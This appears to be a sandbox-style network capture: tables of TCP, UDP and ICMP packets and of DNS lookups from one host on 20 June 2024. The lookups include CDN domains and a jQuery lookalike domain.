Jun 20, 2024 18:14:15.722258091 CEST	443	49723	38.34.185.163	192.168.2.10
Jun 20, 2024 18:14:15.725848913 CEST	443	49723	38.34.185.163	192.168.2.10
Jun 20, 2024 18:14:15.725924015 CEST	49723	443	192.168.2.10	38.34.185.163
Jun 20, 2024 18:14:15.727884054 CEST	49723	443	192.168.2.10	38.34.185.163
Jun 20, 2024 18:14:15.728074074 CEST	443	49723	38.34.185.163	192.168.2.10
Jun 20, 2024 18:14:15.734299898 CEST	49723	443	192.168.2.10	38.34.185.163
Jun 20, 2024 18:14:15.734323978 CEST	443	49723	38.34.185.163	192.168.2.10
Jun 20, 2024 18:14:15.778901100 CEST	49723	443	192.168.2.10	38.34.185.163
Jun 20, 2024 18:14:16.266119003 CEST	443	49724	184.28.90.27	192.168.2.10
Jun 20, 2024 18:14:16.266252995 CEST	49724	443	192.168.2.10	184.28.90.27
Jun 20, 2024 18:14:16.270658016 CEST	49724	443	192.168.2.10	184.28.90.27
Jun 20, 2024 18:14:16.270665884 CEST	443	49724	184.28.90.27	192.168.2.10
Jun 20, 2024 18:14:16.271019936 CEST	443	49724	184.28.90.27	192.168.2.10
Jun 20, 2024 18:14:16.316870928 CEST	49724	443	192.168.2.10	184.28.90.27
Jun 20, 2024 18:14:16.352807045 CEST	49725	443	192.168.2.10	38.34.185.163
Jun 20, 2024 18:14:16.352855921 CEST	443	49725	38.34.185.163	192.168.2.10
Jun 20, 2024 18:14:16.352916956 CEST	49725	443	192.168.2.10	38.34.185.163
Jun 20, 2024 18:14:16.353166103 CEST	49725	443	192.168.2.10	38.34.185.163
Jun 20, 2024 18:14:16.353185892 CEST	443	49725	38.34.185.163	192.168.2.10
Jun 20, 2024 18:14:16.364514112 CEST	443	49724	184.28.90.27	192.168.2.10
Jun 20, 2024 18:14:16.543140888 CEST	443	49724	184.28.90.27	192.168.2.10
Jun 20, 2024 18:14:16.543209076 CEST	443	49724	184.28.90.27	192.168.2.10
Jun 20, 2024 18:14:16.543261051 CEST	49724	443	192.168.2.10	184.28.90.27
Jun 20, 2024 18:14:16.594902992 CEST	49724	443	192.168.2.10	184.28.90.27
Jun 20, 2024 18:14:16.594953060 CEST	443	49724	184.28.90.27	192.168.2.10
Jun 20, 2024 18:14:16.594965935 CEST	49724	443	192.168.2.10	184.28.90.27
Jun 20, 2024 18:14:16.594974995 CEST	443	49724	184.28.90.27	192.168.2.10
Jun 20, 2024 18:14:16.656363010 CEST	443	49723	38.34.185.163	192.168.2.10
Jun 20, 2024 18:14:16.673118114 CEST	443	49723	38.34.185.163	192.168.2.10
Jun 20, 2024 18:14:16.673194885 CEST	49723	443	192.168.2.10	38.34.185.163
Jun 20, 2024 18:14:16.781337976 CEST	49723	443	192.168.2.10	38.34.185.163
Jun 20, 2024 18:14:16.781392097 CEST	443	49723	38.34.185.163	192.168.2.10
Jun 20, 2024 18:14:16.980844975 CEST	49728	443	192.168.2.10	18.239.36.13
Jun 20, 2024 18:14:16.980882883 CEST	443	49728	18.239.36.13	192.168.2.10
Jun 20, 2024 18:14:16.981031895 CEST	49728	443	192.168.2.10	18.239.36.13
Jun 20, 2024 18:14:16.981430054 CEST	49728	443	192.168.2.10	18.239.36.13
Jun 20, 2024 18:14:16.981442928 CEST	443	49728	18.239.36.13	192.168.2.10
Jun 20, 2024 18:14:16.982736111 CEST	49729	443	192.168.2.10	184.28.90.27
Jun 20, 2024 18:14:16.982772112 CEST	443	49729	184.28.90.27	192.168.2.10
Jun 20, 2024 18:14:16.982848883 CEST	49729	443	192.168.2.10	184.28.90.27
Jun 20, 2024 18:14:16.983488083 CEST	49729	443	192.168.2.10	184.28.90.27
Jun 20, 2024 18:14:16.983501911 CEST	443	49729	184.28.90.27	192.168.2.10
Jun 20, 2024 18:14:17.233479023 CEST	443	49725	38.34.185.163	192.168.2.10
Jun 20, 2024 18:14:17.234272957 CEST	49725	443	192.168.2.10	38.34.185.163
Jun 20, 2024 18:14:17.234307051 CEST	443	49725	38.34.185.163	192.168.2.10
Jun 20, 2024 18:14:17.234666109 CEST	443	49725	38.34.185.163	192.168.2.10
Jun 20, 2024 18:14:17.235085964 CEST	49725	443	192.168.2.10	38.34.185.163
Jun 20, 2024 18:14:17.235152960 CEST	443	49725	38.34.185.163	192.168.2.10
Jun 20, 2024 18:14:17.235471010 CEST	49725	443	192.168.2.10	38.34.185.163
Jun 20, 2024 18:14:17.276510000 CEST	443	49725	38.34.185.163	192.168.2.10
Jun 20, 2024 18:14:17.638196945 CEST	443	49729	184.28.90.27	192.168.2.10
Jun 20, 2024 18:14:17.638283014 CEST	49729	443	192.168.2.10	184.28.90.27
Jun 20, 2024 18:14:17.639642954 CEST	49729	443	192.168.2.10	184.28.90.27
Jun 20, 2024 18:14:17.639650106 CEST	443	49729	184.28.90.27	192.168.2.10
Jun 20, 2024 18:14:17.639879942 CEST	443	49729	184.28.90.27	192.168.2.10
Jun 20, 2024 18:14:17.641457081 CEST	49729	443	192.168.2.10	184.28.90.27
Jun 20, 2024 18:14:17.671082020 CEST	443	49728	18.239.36.13	192.168.2.10
Jun 20, 2024 18:14:17.671442986 CEST	49728	443	192.168.2.10	18.239.36.13
Jun 20, 2024 18:14:17.671471119 CEST	443	49728	18.239.36.13	192.168.2.10
Jun 20, 2024 18:14:17.672558069 CEST	443	49728	18.239.36.13	192.168.2.10
Jun 20, 2024 18:14:17.672632933 CEST	49728	443	192.168.2.10	18.239.36.13
Jun 20, 2024 18:14:17.673023939 CEST	49728	443	192.168.2.10	18.239.36.13
Jun 20, 2024 18:14:17.673094988 CEST	443	49728	18.239.36.13	192.168.2.10
Jun 20, 2024 18:14:17.673176050 CEST	49728	443	192.168.2.10	18.239.36.13
Jun 20, 2024 18:14:17.673185110 CEST	443	49728	18.239.36.13	192.168.2.10
Jun 20, 2024 18:14:17.684509993 CEST	443	49729	184.28.90.27	192.168.2.10
Jun 20, 2024 18:14:17.728543997 CEST	49728	443	192.168.2.10	18.239.36.13
Jun 20, 2024 18:14:17.917582035 CEST	443	49728	18.239.36.13	192.168.2.10
Jun 20, 2024 18:14:17.917721033 CEST	443	49728	18.239.36.13	192.168.2.10
Jun 20, 2024 18:14:17.917785883 CEST	49728	443	192.168.2.10	18.239.36.13
Jun 20, 2024 18:14:17.918540001 CEST	49728	443	192.168.2.10	18.239.36.13
Jun 20, 2024 18:14:17.918557882 CEST	443	49728	18.239.36.13	192.168.2.10
Jun 20, 2024 18:14:17.928076029 CEST	443	49729	184.28.90.27	192.168.2.10
Jun 20, 2024 18:14:17.928153038 CEST	443	49729	184.28.90.27	192.168.2.10
Jun 20, 2024 18:14:17.928370953 CEST	49729	443	192.168.2.10	184.28.90.27
Jun 20, 2024 18:14:17.928997040 CEST	49729	443	192.168.2.10	184.28.90.27
Jun 20, 2024 18:14:17.929014921 CEST	443	49729	184.28.90.27	192.168.2.10
Jun 20, 2024 18:14:17.929025888 CEST	49729	443	192.168.2.10	184.28.90.27
Jun 20, 2024 18:14:17.929033041 CEST	443	49729	184.28.90.27	192.168.2.10
Jun 20, 2024 18:14:19.102032900 CEST	443	49725	38.34.185.163	192.168.2.10
Jun 20, 2024 18:14:19.147753000 CEST	443	49725	38.34.185.163	192.168.2.10
Jun 20, 2024 18:14:19.147825956 CEST	49725	443	192.168.2.10	38.34.185.163
Jun 20, 2024 18:14:19.205809116 CEST	49725	443	192.168.2.10	38.34.185.163
Jun 20, 2024 18:14:19.205846071 CEST	443	49725	38.34.185.163	192.168.2.10
Jun 20, 2024 18:14:19.705353975 CEST	49731	443	192.168.2.10	38.34.185.163
Jun 20, 2024 18:14:19.705404997 CEST	443	49731	38.34.185.163	192.168.2.10
Jun 20, 2024 18:14:19.705470085 CEST	49731	443	192.168.2.10	38.34.185.163
Jun 20, 2024 18:14:19.705698013 CEST	49731	443	192.168.2.10	38.34.185.163
Jun 20, 2024 18:14:19.705717087 CEST	443	49731	38.34.185.163	192.168.2.10
Jun 20, 2024 18:14:20.606775045 CEST	443	49731	38.34.185.163	192.168.2.10
Jun 20, 2024 18:14:20.611186981 CEST	49731	443	192.168.2.10	38.34.185.163
Jun 20, 2024 18:14:20.611195087 CEST	443	49731	38.34.185.163	192.168.2.10
Jun 20, 2024 18:14:20.611634970 CEST	443	49731	38.34.185.163	192.168.2.10
Jun 20, 2024 18:14:20.618479013 CEST	49731	443	192.168.2.10	38.34.185.163
Jun 20, 2024 18:14:20.618612051 CEST	443	49731	38.34.185.163	192.168.2.10
Jun 20, 2024 18:14:20.618659973 CEST	49731	443	192.168.2.10	38.34.185.163
Jun 20, 2024 18:14:20.664490938 CEST	443	49731	38.34.185.163	192.168.2.10
Jun 20, 2024 18:14:20.728780031 CEST	49731	443	192.168.2.10	38.34.185.163
Jun 20, 2024 18:14:20.728787899 CEST	49677	443	192.168.2.10	20.42.65.85
Jun 20, 2024 18:14:22.226692915 CEST	443	49731	38.34.185.163	192.168.2.10
Jun 20, 2024 18:14:22.267551899 CEST	443	49731	38.34.185.163	192.168.2.10
Jun 20, 2024 18:14:22.267626047 CEST	49731	443	192.168.2.10	38.34.185.163
Jun 20, 2024 18:14:22.267775059 CEST	49731	443	192.168.2.10	38.34.185.163
Jun 20, 2024 18:14:22.267792940 CEST	443	49731	38.34.185.163	192.168.2.10
Jun 20, 2024 18:14:25.332957029 CEST	443	49722	142.250.185.132	192.168.2.10
Jun 20, 2024 18:14:25.333018064 CEST	443	49722	142.250.185.132	192.168.2.10
Jun 20, 2024 18:14:25.333128929 CEST	49722	443	192.168.2.10	142.250.185.132
Jun 20, 2024 18:14:25.899525881 CEST	49737	443	192.168.2.10	40.68.123.157
Jun 20, 2024 18:14:25.899558067 CEST	443	49737	40.68.123.157	192.168.2.10
Jun 20, 2024 18:14:25.899660110 CEST	49737	443	192.168.2.10	40.68.123.157
Jun 20, 2024 18:14:25.901046991 CEST	49737	443	192.168.2.10	40.68.123.157
Jun 20, 2024 18:14:25.901062012 CEST	443	49737	40.68.123.157	192.168.2.10
Jun 20, 2024 18:14:26.687872887 CEST	443	49737	40.68.123.157	192.168.2.10
Jun 20, 2024 18:14:26.689116001 CEST	49737	443	192.168.2.10	40.68.123.157
Jun 20, 2024 18:14:26.701117039 CEST	49737	443	192.168.2.10	40.68.123.157
Jun 20, 2024 18:14:26.701148987 CEST	443	49737	40.68.123.157	192.168.2.10
Jun 20, 2024 18:14:26.701519966 CEST	443	49737	40.68.123.157	192.168.2.10
Jun 20, 2024 18:14:26.751223087 CEST	49737	443	192.168.2.10	40.68.123.157
Jun 20, 2024 18:14:26.935640097 CEST	49722	443	192.168.2.10	142.250.185.132
Jun 20, 2024 18:14:26.935673952 CEST	443	49722	142.250.185.132	192.168.2.10
Jun 20, 2024 18:14:27.736525059 CEST	49737	443	192.168.2.10	40.68.123.157
Jun 20, 2024 18:14:27.784512997 CEST	443	49737	40.68.123.157	192.168.2.10
Jun 20, 2024 18:14:27.993192911 CEST	443	49737	40.68.123.157	192.168.2.10
Jun 20, 2024 18:14:27.993215084 CEST	443	49737	40.68.123.157	192.168.2.10
Jun 20, 2024 18:14:27.993222952 CEST	443	49737	40.68.123.157	192.168.2.10
Jun 20, 2024 18:14:27.993233919 CEST	443	49737	40.68.123.157	192.168.2.10
Jun 20, 2024 18:14:27.993271112 CEST	443	49737	40.68.123.157	192.168.2.10
Jun 20, 2024 18:14:27.993326902 CEST	49737	443	192.168.2.10	40.68.123.157
Jun 20, 2024 18:14:27.993352890 CEST	443	49737	40.68.123.157	192.168.2.10
Jun 20, 2024 18:14:27.993365049 CEST	49737	443	192.168.2.10	40.68.123.157
Jun 20, 2024 18:14:27.993371010 CEST	443	49737	40.68.123.157	192.168.2.10
Jun 20, 2024 18:14:27.993412971 CEST	49737	443	192.168.2.10	40.68.123.157
Jun 20, 2024 18:14:28.049616098 CEST	49672	443	192.168.2.10	173.222.162.55
Jun 20, 2024 18:14:28.050110102 CEST	49743	443	192.168.2.10	173.222.162.55
Jun 20, 2024 18:14:28.050165892 CEST	443	49743	173.222.162.55	192.168.2.10
Jun 20, 2024 18:14:28.050218105 CEST	49743	443	192.168.2.10	173.222.162.55
Jun 20, 2024 18:14:28.050714970 CEST	49743	443	192.168.2.10	173.222.162.55
Jun 20, 2024 18:14:28.050728083 CEST	443	49743	173.222.162.55	192.168.2.10
Jun 20, 2024 18:14:28.355525970 CEST	49672	443	192.168.2.10	173.222.162.55
Jun 20, 2024 18:14:28.664542913 CEST	443	49743	173.222.162.55	192.168.2.10
Jun 20, 2024 18:14:28.664609909 CEST	49743	443	192.168.2.10	173.222.162.55
Jun 20, 2024 18:14:28.699861050 CEST	49737	443	192.168.2.10	40.68.123.157
Jun 20, 2024 18:14:28.699881077 CEST	443	49737	40.68.123.157	192.168.2.10
Jun 20, 2024 18:14:28.699897051 CEST	49737	443	192.168.2.10	40.68.123.157
Jun 20, 2024 18:14:28.699903011 CEST	443	49737	40.68.123.157	192.168.2.10
Jun 20, 2024 18:14:28.979609013 CEST	49672	443	192.168.2.10	173.222.162.55
Jun 20, 2024 18:14:30.224996090 CEST	49672	443	192.168.2.10	173.222.162.55
Jun 20, 2024 18:14:32.635441065 CEST	49672	443	192.168.2.10	173.222.162.55
Jun 20, 2024 18:14:37.447776079 CEST	49672	443	192.168.2.10	173.222.162.55
Jun 20, 2024 18:14:43.113303900 CEST	55236	53	192.168.2.10	162.159.36.2
Jun 20, 2024 18:14:43.118170977 CEST	53	55236	162.159.36.2	192.168.2.10
Jun 20, 2024 18:14:43.118310928 CEST	55236	53	192.168.2.10	162.159.36.2
Jun 20, 2024 18:14:43.118310928 CEST	55236	53	192.168.2.10	162.159.36.2
Jun 20, 2024 18:14:43.123192072 CEST	53	55236	162.159.36.2	192.168.2.10
Jun 20, 2024 18:14:43.578705072 CEST	53	55236	162.159.36.2	192.168.2.10
Jun 20, 2024 18:14:43.590379953 CEST	55236	53	192.168.2.10	162.159.36.2
Jun 20, 2024 18:14:43.595818043 CEST	53	55236	162.159.36.2	192.168.2.10
Jun 20, 2024 18:14:43.595973969 CEST	55236	53	192.168.2.10	162.159.36.2
Jun 20, 2024 18:14:44.506299973 CEST	55238	443	192.168.2.10	40.68.123.157
Jun 20, 2024 18:14:44.506335974 CEST	443	55238	40.68.123.157	192.168.2.10
Jun 20, 2024 18:14:44.506458998 CEST	55238	443	192.168.2.10	40.68.123.157
Jun 20, 2024 18:14:44.506949902 CEST	55238	443	192.168.2.10	40.68.123.157
Jun 20, 2024 18:14:44.506958961 CEST	443	55238	40.68.123.157	192.168.2.10
Jun 20, 2024 18:14:45.323806047 CEST	443	55238	40.68.123.157	192.168.2.10
Jun 20, 2024 18:14:45.323893070 CEST	55238	443	192.168.2.10	40.68.123.157
Jun 20, 2024 18:14:45.325839996 CEST	55238	443	192.168.2.10	40.68.123.157
Jun 20, 2024 18:14:45.325851917 CEST	443	55238	40.68.123.157	192.168.2.10
Jun 20, 2024 18:14:45.326131105 CEST	443	55238	40.68.123.157	192.168.2.10
Jun 20, 2024 18:14:45.328820944 CEST	55238	443	192.168.2.10	40.68.123.157
Jun 20, 2024 18:14:45.376497030 CEST	443	55238	40.68.123.157	192.168.2.10
Jun 20, 2024 18:14:45.574055910 CEST	443	55238	40.68.123.157	192.168.2.10
Jun 20, 2024 18:14:45.574193001 CEST	443	55238	40.68.123.157	192.168.2.10
Jun 20, 2024 18:14:45.574296951 CEST	55238	443	192.168.2.10	40.68.123.157
Jun 20, 2024 18:14:45.574553013 CEST	55238	443	192.168.2.10	40.68.123.157
Jun 20, 2024 18:14:45.574568033 CEST	443	55238	40.68.123.157	192.168.2.10
Jun 20, 2024 18:14:46.701339006 CEST	55239	443	192.168.2.10	20.114.59.183
Jun 20, 2024 18:14:46.701395035 CEST	443	55239	20.114.59.183	192.168.2.10
Jun 20, 2024 18:14:46.701452017 CEST	55239	443	192.168.2.10	20.114.59.183
Jun 20, 2024 18:14:46.702389002 CEST	55239	443	192.168.2.10	20.114.59.183
Jun 20, 2024 18:14:46.702411890 CEST	443	55239	20.114.59.183	192.168.2.10
Jun 20, 2024 18:14:47.053849936 CEST	49672	443	192.168.2.10	173.222.162.55
Jun 20, 2024 18:14:47.479748964 CEST	443	55239	20.114.59.183	192.168.2.10
Jun 20, 2024 18:14:47.479809999 CEST	55239	443	192.168.2.10	20.114.59.183
Jun 20, 2024 18:14:47.491569996 CEST	55239	443	192.168.2.10	20.114.59.183
Jun 20, 2024 18:14:47.491595030 CEST	443	55239	20.114.59.183	192.168.2.10
Jun 20, 2024 18:14:47.491939068 CEST	443	55239	20.114.59.183	192.168.2.10
Jun 20, 2024 18:14:47.495614052 CEST	55239	443	192.168.2.10	20.114.59.183
Jun 20, 2024 18:14:47.536504030 CEST	443	55239	20.114.59.183	192.168.2.10
Jun 20, 2024 18:14:47.811306000 CEST	443	55239	20.114.59.183	192.168.2.10
Jun 20, 2024 18:14:47.811331987 CEST	443	55239	20.114.59.183	192.168.2.10
Jun 20, 2024 18:14:47.811346054 CEST	443	55239	20.114.59.183	192.168.2.10
Jun 20, 2024 18:14:47.811443090 CEST	55239	443	192.168.2.10	20.114.59.183
Jun 20, 2024 18:14:47.811470032 CEST	443	55239	20.114.59.183	192.168.2.10
Jun 20, 2024 18:14:47.811511993 CEST	443	55239	20.114.59.183	192.168.2.10
Jun 20, 2024 18:14:47.811536074 CEST	55239	443	192.168.2.10	20.114.59.183
Jun 20, 2024 18:14:47.811546087 CEST	443	55239	20.114.59.183	192.168.2.10
Jun 20, 2024 18:14:47.811567068 CEST	55239	443	192.168.2.10	20.114.59.183
Jun 20, 2024 18:14:47.812212944 CEST	443	55239	20.114.59.183	192.168.2.10
Jun 20, 2024 18:14:47.812522888 CEST	55239	443	192.168.2.10	20.114.59.183
Jun 20, 2024 18:14:47.813462973 CEST	55239	443	192.168.2.10	20.114.59.183
Jun 20, 2024 18:14:47.813477039 CEST	443	55239	20.114.59.183	192.168.2.10
Jun 20, 2024 18:14:47.813504934 CEST	55239	443	192.168.2.10	20.114.59.183
Jun 20, 2024 18:14:47.813510895 CEST	443	55239	20.114.59.183	192.168.2.10
Jun 20, 2024 18:14:47.834764004 CEST	443	49743	173.222.162.55	192.168.2.10
Jun 20, 2024 18:14:47.837124109 CEST	49743	443	192.168.2.10	173.222.162.55
Jun 20, 2024 18:14:48.168401003 CEST	55240	443	192.168.2.10	20.114.59.183
Jun 20, 2024 18:14:48.168457031 CEST	443	55240	20.114.59.183	192.168.2.10
Jun 20, 2024 18:14:48.168595076 CEST	55240	443	192.168.2.10	20.114.59.183
Jun 20, 2024 18:14:48.169342995 CEST	55240	443	192.168.2.10	20.114.59.183
Jun 20, 2024 18:14:48.169357061 CEST	443	55240	20.114.59.183	192.168.2.10
Jun 20, 2024 18:14:48.991987944 CEST	443	55240	20.114.59.183	192.168.2.10
Jun 20, 2024 18:14:48.992213964 CEST	55240	443	192.168.2.10	20.114.59.183
Jun 20, 2024 18:14:49.144012928 CEST	55240	443	192.168.2.10	20.114.59.183
Jun 20, 2024 18:14:49.144042015 CEST	443	55240	20.114.59.183	192.168.2.10
Jun 20, 2024 18:14:49.144433975 CEST	443	55240	20.114.59.183	192.168.2.10
Jun 20, 2024 18:14:49.145606995 CEST	55240	443	192.168.2.10	20.114.59.183
Jun 20, 2024 18:14:49.192497969 CEST	443	55240	20.114.59.183	192.168.2.10
Jun 20, 2024 18:14:49.415051937 CEST	443	55240	20.114.59.183	192.168.2.10
Jun 20, 2024 18:14:49.415082932 CEST	443	55240	20.114.59.183	192.168.2.10
Jun 20, 2024 18:14:49.415100098 CEST	443	55240	20.114.59.183	192.168.2.10
Jun 20, 2024 18:14:49.415142059 CEST	55240	443	192.168.2.10	20.114.59.183
Jun 20, 2024 18:14:49.415165901 CEST	443	55240	20.114.59.183	192.168.2.10
Jun 20, 2024 18:14:49.415209055 CEST	55240	443	192.168.2.10	20.114.59.183
Jun 20, 2024 18:14:49.415220022 CEST	55240	443	192.168.2.10	20.114.59.183
Jun 20, 2024 18:14:49.416472912 CEST	443	55240	20.114.59.183	192.168.2.10
Jun 20, 2024 18:14:49.416501999 CEST	443	55240	20.114.59.183	192.168.2.10
Jun 20, 2024 18:14:49.416541100 CEST	55240	443	192.168.2.10	20.114.59.183
Jun 20, 2024 18:14:49.416544914 CEST	443	55240	20.114.59.183	192.168.2.10
Jun 20, 2024 18:14:49.416593075 CEST	55240	443	192.168.2.10	20.114.59.183
Jun 20, 2024 18:14:49.416598082 CEST	443	55240	20.114.59.183	192.168.2.10
Jun 20, 2024 18:14:49.416619062 CEST	443	55240	20.114.59.183	192.168.2.10
Jun 20, 2024 18:14:49.416632891 CEST	55240	443	192.168.2.10	20.114.59.183
Jun 20, 2024 18:14:49.416666031 CEST	55240	443	192.168.2.10	20.114.59.183
Jun 20, 2024 18:14:49.418076992 CEST	55240	443	192.168.2.10	20.114.59.183
Jun 20, 2024 18:14:49.418091059 CEST	443	55240	20.114.59.183	192.168.2.10
Jun 20, 2024 18:14:49.418104887 CEST	55240	443	192.168.2.10	20.114.59.183
Jun 20, 2024 18:14:49.418109894 CEST	443	55240	20.114.59.183	192.168.2.10
Jun 20, 2024 18:15:14.820363998 CEST	55242	443	192.168.2.10	216.58.206.68
Jun 20, 2024 18:15:14.820420027 CEST	443	55242	216.58.206.68	192.168.2.10
Jun 20, 2024 18:15:14.820503950 CEST	55242	443	192.168.2.10	216.58.206.68
Jun 20, 2024 18:15:14.821119070 CEST	55242	443	192.168.2.10	216.58.206.68
Jun 20, 2024 18:15:14.821135044 CEST	443	55242	216.58.206.68	192.168.2.10
Jun 20, 2024 18:15:15.496032953 CEST	443	55242	216.58.206.68	192.168.2.10
Jun 20, 2024 18:15:15.497106075 CEST	55242	443	192.168.2.10	216.58.206.68
Jun 20, 2024 18:15:15.497143030 CEST	443	55242	216.58.206.68	192.168.2.10
Jun 20, 2024 18:15:15.497730017 CEST	443	55242	216.58.206.68	192.168.2.10
Jun 20, 2024 18:15:15.500010967 CEST	55242	443	192.168.2.10	216.58.206.68
Jun 20, 2024 18:15:15.500135899 CEST	443	55242	216.58.206.68	192.168.2.10
Jun 20, 2024 18:15:15.556776047 CEST	55242	443	192.168.2.10	216.58.206.68
Jun 20, 2024 18:15:25.396006107 CEST	443	55242	216.58.206.68	192.168.2.10
Jun 20, 2024 18:15:25.396074057 CEST	443	55242	216.58.206.68	192.168.2.10
Jun 20, 2024 18:15:25.396123886 CEST	55242	443	192.168.2.10	216.58.206.68
Jun 20, 2024 18:15:26.734332085 CEST	55242	443	192.168.2.10	216.58.206.68
Jun 20, 2024 18:15:26.734364033 CEST	443	55242	216.58.206.68	192.168.2.10

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 20, 2024 18:14:10.520773888 CEST	53	63267	1.1.1.1	192.168.2.10
Jun 20, 2024 18:14:10.599391937 CEST	58840	53	192.168.2.10	1.1.1.1
Jun 20, 2024 18:14:10.599669933 CEST	65417	53	192.168.2.10	1.1.1.1
Jun 20, 2024 18:14:10.600981951 CEST	50246	53	192.168.2.10	1.1.1.1
Jun 20, 2024 18:14:10.601331949 CEST	58157	53	192.168.2.10	1.1.1.1
Jun 20, 2024 18:14:10.602628946 CEST	60697	53	192.168.2.10	1.1.1.1
Jun 20, 2024 18:14:10.602824926 CEST	60615	53	192.168.2.10	1.1.1.1
Jun 20, 2024 18:14:10.604460955 CEST	53	56107	1.1.1.1	192.168.2.10
Jun 20, 2024 18:14:10.606898069 CEST	53	65417	1.1.1.1	192.168.2.10
Jun 20, 2024 18:14:10.606959105 CEST	53	58840	1.1.1.1	192.168.2.10
Jun 20, 2024 18:14:10.608489990 CEST	53	58157	1.1.1.1	192.168.2.10
Jun 20, 2024 18:14:10.610806942 CEST	53	60697	1.1.1.1	192.168.2.10
Jun 20, 2024 18:14:10.611622095 CEST	53	50246	1.1.1.1	192.168.2.10
Jun 20, 2024 18:14:11.061367989 CEST	53	60615	1.1.1.1	192.168.2.10
Jun 20, 2024 18:14:11.829216003 CEST	53	63565	1.1.1.1	192.168.2.10
Jun 20, 2024 18:14:13.013478994 CEST	62917	53	192.168.2.10	1.1.1.1
Jun 20, 2024 18:14:13.013649940 CEST	62979	53	192.168.2.10	1.1.1.1
Jun 20, 2024 18:14:13.021945953 CEST	53	62917	1.1.1.1	192.168.2.10
Jun 20, 2024 18:14:13.022645950 CEST	53	62979	1.1.1.1	192.168.2.10
Jun 20, 2024 18:14:14.758045912 CEST	58069	53	192.168.2.10	1.1.1.1
Jun 20, 2024 18:14:14.758306980 CEST	54677	53	192.168.2.10	1.1.1.1
Jun 20, 2024 18:14:14.765671015 CEST	53	54677	1.1.1.1	192.168.2.10
Jun 20, 2024 18:14:14.766689062 CEST	53	58069	1.1.1.1	192.168.2.10
Jun 20, 2024 18:14:14.814624071 CEST	60045	53	192.168.2.10	1.1.1.1
Jun 20, 2024 18:14:14.814800024 CEST	54093	53	192.168.2.10	1.1.1.1
Jun 20, 2024 18:14:14.823853970 CEST	53	60045	1.1.1.1	192.168.2.10
Jun 20, 2024 18:14:15.268841028 CEST	53	54093	1.1.1.1	192.168.2.10
Jun 20, 2024 18:14:16.354401112 CEST	53	51518	1.1.1.1	192.168.2.10
Jun 20, 2024 18:14:16.968669891 CEST	60598	53	192.168.2.10	1.1.1.1
Jun 20, 2024 18:14:16.969424009 CEST	49886	53	192.168.2.10	1.1.1.1
Jun 20, 2024 18:14:16.975980043 CEST	53	60598	1.1.1.1	192.168.2.10
Jun 20, 2024 18:14:16.978207111 CEST	53	49886	1.1.1.1	192.168.2.10
Jun 20, 2024 18:14:29.718950987 CEST	53	53116	1.1.1.1	192.168.2.10
Jun 20, 2024 18:14:43.112593889 CEST	53	52300	162.159.36.2	192.168.2.10
Jun 20, 2024 18:14:43.593697071 CEST	64773	53	192.168.2.10	1.1.1.1
Jun 20, 2024 18:14:43.624804974 CEST	53	64773	1.1.1.1	192.168.2.10
Jun 20, 2024 18:15:00.704067945 CEST	138	138	192.168.2.10	192.168.2.255
Jun 20, 2024 18:15:14.809745073 CEST	61716	53	192.168.2.10	1.1.1.1
Jun 20, 2024 18:15:14.818175077 CEST	53	61716	1.1.1.1	192.168.2.10

ICMP Packets

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Jun 20, 2024 18:14:11.061463118 CEST	192.168.2.10	1.1.1.1	c23f	(Port unreachable)	Destination Unreachable
Jun 20, 2024 18:14:15.268934011 CEST	192.168.2.10	1.1.1.1	c23f	(Port unreachable)	Destination Unreachable

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jun 20, 2024 18:14:10.599391937 CEST	192.168.2.10	1.1.1.1	0x29fd	Standard query (0)	maxcdn.bootstrapcdn.com	A (IP address)	IN (0x0001)	false
Jun 20, 2024 18:14:10.599669933 CEST	192.168.2.10	1.1.1.1	0x7bb9	Standard query (0)	maxcdn.bootstrapcdn.com	65	IN (0x0001)	false
Jun 20, 2024 18:14:10.600981951 CEST	192.168.2.10	1.1.1.1	0xee2a	Standard query (0)	ucarecdn.com	A (IP address)	IN (0x0001)	false
Jun 20, 2024 18:14:10.601331949 CEST	192.168.2.10	1.1.1.1	0x56f1	Standard query (0)	ucarecdn.com	65	IN (0x0001)	false
Jun 20, 2024 18:14:10.602628946 CEST	192.168.2.10	1.1.1.1	0x8591	Standard query (0)	code.jquery.com.de	A (IP address)	IN (0x0001)	false
Jun 20, 2024 18:14:10.602824926 CEST	192.168.2.10	1.1.1.1	0x41e2	Standard query (0)	code.jquery.com.de	65	IN (0x0001)	false
Jun 20, 2024 18:14:13.013478994 CEST	192.168.2.10	1.1.1.1	0x1e3	Standard query (0)	logo.clearbit.com	A (IP address)	IN (0x0001)	false
Jun 20, 2024 18:14:13.013649940 CEST	192.168.2.10	1.1.1.1	0x4612	Standard query (0)	logo.clearbit.com	65	IN (0x0001)	false
Jun 20, 2024 18:14:14.758045912 CEST	192.168.2.10	1.1.1.1	0x306e	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Jun 20, 2024 18:14:14.758306980 CEST	192.168.2.10	1.1.1.1	0x2023	Standard query (0)	www.google.com	65	IN (0x0001)	false
Jun 20, 2024 18:14:14.814624071 CEST	192.168.2.10	1.1.1.1	0x796d	Standard query (0)	code.jquery.com.de	A (IP address)	IN (0x0001)	false
Jun 20, 2024 18:14:14.814800024 CEST	192.168.2.10	1.1.1.1	0xb89e	Standard query (0)	code.jquery.com.de	65	IN (0x0001)	false
Jun 20, 2024 18:14:16.968669891 CEST	192.168.2.10	1.1.1.1	0x4c5e	Standard query (0)	logo.clearbit.com	A (IP address)	IN (0x0001)	false
Jun 20, 2024 18:14:16.969424009 CEST	192.168.2.10	1.1.1.1	0x2335	Standard query (0)	logo.clearbit.com	65	IN (0x0001)	false
Jun 20, 2024 18:14:43.593697071 CEST	192.168.2.10	1.1.1.1	0xaaa8	Standard query (0)	171.39.242.20.in-addr.arpa	PTR (Pointer record)	IN (0x0001)	false
Jun 20, 2024 18:15:14.809745073 CEST	192.168.2.10	1.1.1.1	0xca87	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jun 20, 2024 18:14:10.606898069 CEST	1.1.1.1	192.168.2.10	0x7bb9	No error (0)	maxcdn.bootstrapcdn.com			65	IN (0x0001)	false
Jun 20, 2024 18:14:10.606959105 CEST	1.1.1.1	192.168.2.10	0x29fd	No error (0)	maxcdn.bootstrapcdn.com		104.18.11.207	A (IP address)	IN (0x0001)	false
